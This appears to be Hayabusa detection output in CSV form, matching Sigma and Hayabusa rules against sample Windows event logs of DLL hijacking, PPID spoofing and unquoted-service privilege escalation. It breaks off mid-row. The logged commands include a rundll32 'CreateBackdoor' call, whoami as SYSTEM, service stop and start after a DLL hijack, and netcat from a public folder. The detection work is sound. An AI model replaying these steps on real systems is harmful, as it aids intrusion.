14:00:39.441 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc stop CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc query CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net start CDPSvc : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\net1 start CDPSvc : Path: C:\Windows\System32\net1.exe : User: MSEDGEWIN10\IEUser : Parent Command: net start CDPSvc,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx -2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx -2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx -2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \??\C:\Windows\system32\autochk.exe * : Path: C:\Windows\System32\autochk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000cc 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000d8 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""dwm.exe"" : Path: C:\Windows\System32\dwm.exe : User: Window Manager\DWM-1 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 : Path: C:\Windows\System32\upfc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dxgiadaptercache.exe : Path: C:\Windows\System32\dxgiadaptercache.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 